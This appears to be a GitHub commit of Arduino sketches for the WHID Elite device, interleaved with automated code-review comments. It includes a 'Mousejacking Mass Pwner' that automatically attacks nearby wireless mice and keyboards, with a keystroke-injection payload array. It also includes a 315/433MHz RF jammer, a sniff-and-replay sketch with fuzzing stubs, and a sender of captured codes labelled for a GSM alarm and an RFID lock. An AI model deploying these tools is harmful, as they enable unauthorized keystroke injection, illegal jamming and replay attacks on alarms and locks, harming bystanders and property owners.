
uploading sketches

whid-injector committed Nov 12, 2019
1 parent 9e52a4b commit e7cf92d145d19401db33997c0374062b376ec27a


@@ -0,0 +1,8 @@
Sketch for using WHID Elite as Mousejacking Mass Pwner Standalone Tool.
Once flashed into WHIDElite, it will automatically search and attack all vulnerable Mice & Keyboards around.
BE CAREFUL!
This is based on uCMousejack[1].
[1] https://github.com/phikshun/uC_mousejack

P.S. This standalone mode doesn't need to be plugged into a PC to work. Is enough to plug the WHID Elite on a USB-battery-pack or use a bigger LiPo (e.g. 1500mAh) and enjoy a MouseDriving session. ;] https://twitter.com/LucaBongiorni/status/872023328487342080

@@ -0,0 +1,13 @@
uint8_t attack[] = {
0x08, 0x15, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x0c, 0x00, 0x00, 0x08, 0x00,
0x00, 0x1b, 0x00, 0x00, 0x13, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x12, 0x00,
0x00, 0x15, 0x00, 0x00, 0x08, 0x00, 0x00, 0x2c, 0x00, 0x00, 0x2d, 0x00,
0x00, 0x0e, 0x00, 0x00, 0x2c, 0x00, 0x00, 0x0b, 0x00, 0x00, 0x17, 0x00,
0x00, 0x17, 0x00, 0x00, 0x13, 0x00, 0x02, 0x33, 0x00, 0x00, 0x38, 0x00,
0x00, 0x38, 0x00, 0x00, 0x09, 0x00, 0x00, 0x04, 0x00, 0x00, 0x0e, 0x00,
0x00, 0x08, 0x00, 0x00, 0x18, 0x00, 0x00, 0x13, 0x00, 0x00, 0x07, 0x00,
0x00, 0x04, 0x00, 0x00, 0x17, 0x00, 0x00, 0x08, 0x00, 0x00, 0x37, 0x00,
0x00, 0x11, 0x00, 0x00, 0x08, 0x00, 0x00, 0x17, 0x00, 0x00, 0x38, 0x00,
0x00, 0x1a, 0x00, 0x00, 0x11, 0x00, 0x00, 0x06, 0x00, 0x00, 0x38, 0x00,
0x00, 0x28, 0x00,
};
@@ -0,0 +1,6 @@
Sketch to test the Jamming feature.

You need to connect either 315/433MHz TX to D11, Vcc and GND.

BE CAREFUL.
Better run it on a Faraday Cage.
@@ -0,0 +1,14 @@
//### Pin D11 or Pin D7 <==> Data (315/433MHz TX)
//### Pin Vcc <==> Vcc (315/433MHz TX)
//### Pin GND <==> GND (315/433MHz TX)

void setup() {
//tone(11, 15000, 5000);
}

void loop() {
// Transmitter on pin #11 or pin #7
tone(11, 15000, 10000); // It generates a square wave Default:15000
//tone(7, 15000, 10000);
//tone(11, 15000);
}
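Review bot: `loop()` re-issues `tone(11, 15000, 10000)` on every pass, and since loop() cycles far faster than 10 s the duration argument never expires, so the output is effectively continuous rather than a timed burst. If continuous output is the intent, the two-argument form already kept in the comment, `tone(11, 15000);`, states that directly; if a single timed burst is the intent, the call belongs in `setup()`, where the commented-out call currently sits. Either way, a one-line comment at the top saying which behaviour is wanted would save the next reader from guessing between the three variants.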
@@ -0,0 +1,25 @@
/*
Example for receiving
https://github.com/sui77/rc-switch/
If you want to visualize a telegram copy the raw data and
paste it into http://test.sui.li/oszi/
*/

#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();

void setup() {
Serial.begin(9600);
mySwitch.enableReceive(0); // (6) We use D7, which is INT6, atmega32u4 chip pin #1 ### https://web.archive.org/web/20140914105154/http://propaneandelectrons.com/blog/int6-on-arduino-leonardo-atmega32u4
} //(0) FF Pin 3, INT0

void loop() {
if (mySwitch.available()) {
output(mySwitch.getReceivedValue(), mySwitch.getReceivedBitlength(), mySwitch.getReceivedDelay(), mySwitch.getReceivedRawdata(),mySwitch.getReceivedProtocol());
//Decimal: 15532481 (24Bit) Binary: 111011010000000111000001
mySwitch.resetAvailable();
}
}
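Review bot: The comment on the `mySwitch.enableReceive(0)` call says the receiver is on D7/INT6, but the argument passed is interrupt 0, and the trailing comment on setup()'s closing brace says "(0) FF Pin 3, INT0" — the two comments contradict each other and only the second matches the code. Document the actual wiring next to the call, e.g. `mySwitch.enableReceive(0); // INT0 = D3; pass 6 for D7/INT6 on ATmega32U4`, and drop the stray comment from the closing brace. The simpler receive sketch further down carries the same "We use D7, which is INT6" comment on an `enableReceive(0)` call and should get the same fix.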
@@ -0,0 +1,72 @@
static const char* bin2tristate(const char* bin);
static char * dec2binWzerofill(unsigned long Dec, unsigned int bitLength);

void output(unsigned long decimal, unsigned int length, unsigned int delay, unsigned int* raw, unsigned int protocol) {

//Decimal: 15532481 (24Bit) Binary: 111011010000000111000001

const char* b = dec2binWzerofill(decimal, length);
Serial.print("Decimal: ");
Serial.print(decimal);
Serial.print(" (");
Serial.print( length );
Serial.print("Bit) Binary: ");
Serial.print( b );
// Serial.print(" Tri-State: ");
// Serial.print( bin2tristate( b) );
// Serial.print(" PulseLength: ");
// Serial.print(delay);
// Serial.print(" microseconds");
// Serial.print(" Protocol: ");
// Serial.println(protocol);
//
// Serial.print("Raw data: ");
// for (unsigned int i=0; i<= length*2; i++) {
// Serial.print(raw[i]);
// Serial.print(",");
// }
Serial.println();
Serial.println();
}

static const char* bin2tristate(const char* bin) {
static char returnValue[50];
int pos = 0;
int pos2 = 0;
while (bin[pos]!='\0' && bin[pos+1]!='\0') {
if (bin[pos]=='0' && bin[pos+1]=='0') {
returnValue[pos2] = '0';
} else if (bin[pos]=='1' && bin[pos+1]=='1') {
returnValue[pos2] = '1';
} else if (bin[pos]=='0' && bin[pos+1]=='1') {
returnValue[pos2] = 'F';
} else {
return "not applicable";
}
pos = pos+2;
pos2++;
}
returnValue[pos2] = '\0';
return returnValue;
}

static char * dec2binWzerofill(unsigned long Dec, unsigned int bitLength) {
static char bin[64];
unsigned int i=0;

while (Dec > 0) {
bin[32+i++] = ((Dec & 1) > 0) ? '1' : '0';
Dec = Dec >> 1;
}

for (unsigned int j = 0; j< bitLength; j++) {
if (j >= bitLength - i) {
bin[j] = bin[ 31 + i - (j - (bitLength - i)) ];
} else {
bin[j] = '0';
}
}
bin[bitLength] = '\0';

return bin;
}
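Review bot: `dec2binWzerofill` writes `bin[j]` for every `j < bitLength` and then `bin[bitLength] = '\0'` with no bound on `bitLength`, while `bin` is a fixed 64-byte static buffer; the length reaches it from `output()`, which takes it straight from `getReceivedBitlength()`, i.e. from the received RF frame. A clamp at the top of the function, `if (bitLength > sizeof(bin) - 1) bitLength = sizeof(bin) - 1;`, keeps the write in bounds; the library may well cap the bit length at 32 already, but the helper should not rely on that. Separately, when the value has more set bits than `bitLength`, `bitLength - i` wraps as unsigned and the loop silently emits all zeros — worth an early return or at least a comment. `output()` also declares `delay`, `raw` and `protocol` that are referenced only from commented-out code.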
@@ -0,0 +1,32 @@
/*
Simple example for receiving
https://github.com/sui77/rc-switch/
*/

#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();

void setup() {
Serial.begin(4800);
mySwitch.enableReceive(0); // We use D7, which is INT6, atmega32u4 chip pin #1 ### https://web.archive.org/web/20140914105154/http://propaneandelectrons.com/blog/int6-on-arduino-leonardo-atmega32u4
}

void loop() {
if (mySwitch.available()) {

Serial.print("Received ");
Serial.print( mySwitch.getReceivedValue() );
Serial.print(" / ");
Serial.print( mySwitch.getReceivedBitlength() );
Serial.print("bit ");
Serial.print("Delay: ");
Serial.println( mySwitch.getReceivedDelay() );
Serial.print("Protocol: ");
Serial.println( mySwitch.getReceivedProtocol() );

mySwitch.resetAvailable();
}
}


@@ -0,0 +1,74 @@
/*
* Sniff ASK/OOK packet and Re-Transmit it after 10 Seconds.
* Based on RF Sniffer (C) Elia Yehuda 2014
*/

#include <RCSwitch.h>
// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 50
RCSwitch rfSwitch = RCSwitch();

void setup()
{
Serial.begin(4800);
// Receiver on interrupt INT0 (Pin #D3 of FF too)
rfSwitch.enableReceive(0);
// Transmitter on pin #11 or pin #7
rfSwitch.enableTransmit(11);
rfSwitch.setRepeatTransmit(RESEND_SNIFFED_VALUES);
}

//Decimal-to-binary-ascii procedure
char *tobin32(unsigned long x)
{
static char b[33];
b[32] = '\0';
for ( int z = 0; z < 32; z++) {
b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
}
return b;
}

void process_rf_value(RCSwitch rfswitch)
{
char str[120];
unsigned long value;
value = rfswitch.getReceivedValue();
Serial.println(F("------------------------------------------- SNIFF & REPLAY -------------------------------------------"));
if (value) {
sprintf(str, "[O] [Packet Received] Binary: %s / Decimal: %010lu / %02d bit / Protocol = %d", tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
//sprintf(str, "[O] [Packet Received] Binary: %s / Bit Length: %02d bit", tobin32(value), rfswitch.getReceivedBitlength());
} else {
sprintf(str, "[o] Packet Received: Unknown encoding (0)");
}

Serial.println(str);
delay(1000);
Serial.println(F("[O] Sending back the packet sniffed in 3 seconds..."));
delay(1000);
Serial.println(F("[O] Sending back the packet sniffed in 2 seconds..."));
delay(1000);
Serial.println(F("[O] Sending back the packet sniffed in 1 second..."));
delay(1000);
Serial.println(F("[O] BOOOM!"));
rfswitch.send(value, rfswitch.getReceivedBitlength());
//rfswitch.send(value+1, rfswitch.getReceivedBitlength()); //### PoC
//delay(1000);
// for (int i = 0; i <= 11; i++) {
// rfswitch.send(value + i, 24);
// Serial.print(F("Fuzzing: "));
// Serial.println(value + i);
// delay(500);
// }
Serial.println(F("[O] Packets Sent!"));
Serial.println(F("-----------------------------------------------------------------------------------------------------"));
// reset the switch to allow more data to come
rfswitch.resetAvailable();
}

void loop()
{
if (rfSwitch.available()) {
process_rf_value(rfSwitch);
}
}
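Review bot: `sprintf(str, ...)` in `process_rf_value` formats into the fixed 120-byte `str` with no length bound; the `%s` from `tobin32` is at most 32 characters and the fixed text plus numbers comes to roughly 110 bytes, so it fits today, but the margin is a handful of bytes and any later edit to the format string would overflow silently. Use `snprintf(str, sizeof str, ...)` for both calls. `process_rf_value(RCSwitch rfswitch)` also takes the switch by value, copying the global on every packet; `void process_rf_value(RCSwitch& rfswitch)` avoids the copy and makes `resetAvailable()` and `send()` visibly act on the same object `loop()` polls — the current code presumably works only because the library keeps the received-data state shared across instances, which is worth confirming.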
@@ -0,0 +1,7 @@
Simple sketch to send an arbitrary binary sequence!
Transmitter on pin #11 or pin #7

For some reasons there is a bug in rcswitch library, which adds one zero more... so remove the last one from the binary you want to TX!!!
Example, the right signal is:
1010010111101011000001000 // original signal
101001011110101100000100 // to use (see! one zero less at the end)
@@ -0,0 +1,46 @@
/* Simple sketch to send an arbitrary binary sequence!
For some reasons there is a bug in rcswitch library, which adds one zero more... so remove the last one from the binary you want to TX!!!
Example, the right signal is:
1010010111101011000001000 // original signal
101001011110101100000100 // to use (see! one zero less at the end) */


#include <RCSwitch.h>

RCSwitch mySwitch = RCSwitch();
int timeDelay = 135;

void setup() {
Serial.begin(4800);
Serial.println(F("[+] Botting Up..."));
// Transmitter on pin #11 or pin #7
mySwitch.enableTransmit(11); //Pin D11
// set protocol (default is 1, will work for most outlets)
// mySwitch.setProtocol(2);
// Optional set pulse length. (this must be set after protocol (if set). Otherwise is overridden).
//mySwitch.setPulseLength(456);
// Optional set number of transmission repetitions.
mySwitch.setRepeatTransmit(5);
}

void loop() {
// Use this to add manually specific HIGH or LOW pulses with specific length.
// int highLength = 4;
// int lowLength = 18;
// digitalWrite(11, HIGH);
// delayMicroseconds(highLength*timeDelay);
// digitalWrite(11,LOW);
// delayMicroseconds(lowLength*timeDelay);

// #### For some reasons there is a bug... rcswitch adds one zero more... so remove the last one from the signal binary!!!
// ### Example, the right signal is
// 1010010111101011000001000 // original signal
// 101001011110101100000100 //to use (see! one zero less at the end)
Serial.println(F("[+] Sending Packets!"));

//mySwitch.send("101001011110101100000100"); // GSM Alarm at 433MHz
mySwitch.send("010101010101010100001100"); // RFID RFLock at 315MHz
//mySwitch.send("011101101101010011101000"); // Crane Packet?!

delay(2000);
}
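Review bot: `timeDelay` is defined at file scope but referenced only from the commented-out pulse code in `loop()`, so it is dead in the compiled sketch; either drop it or turn the pulse code into a real helper that uses it. The boot message reads `"[+] Botting Up..."`, presumably meant as `"[+] Booting Up..."`. The send call hard-codes one of three sample codes with the other two commented out; a named constant such as `const char* const kCode = "010101010101010100001100"; // RFID RFLock at 315MHz` passed to `mySwitch.send(kCode)` makes which code is being sent obvious without reading through the commented alternatives.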
@@ -0,0 +1,4 @@
WHID_TestSuite.ino is a testing suite, based on the existing one from FONA library, that allows to test if the SIM800L works properly.
I added also the command K which is used to check if the HID emulation works properly on Windows. It will run usual calc.exe
Once uploaded the sketch, open SerialMonitor. SIM800 will boot and you can type ? To see the commands available.
TODO: Finish to add k command and all other possible unit-tests to check WHID Elite's functionalities. E.g. spy, askTX, askRX, etc...
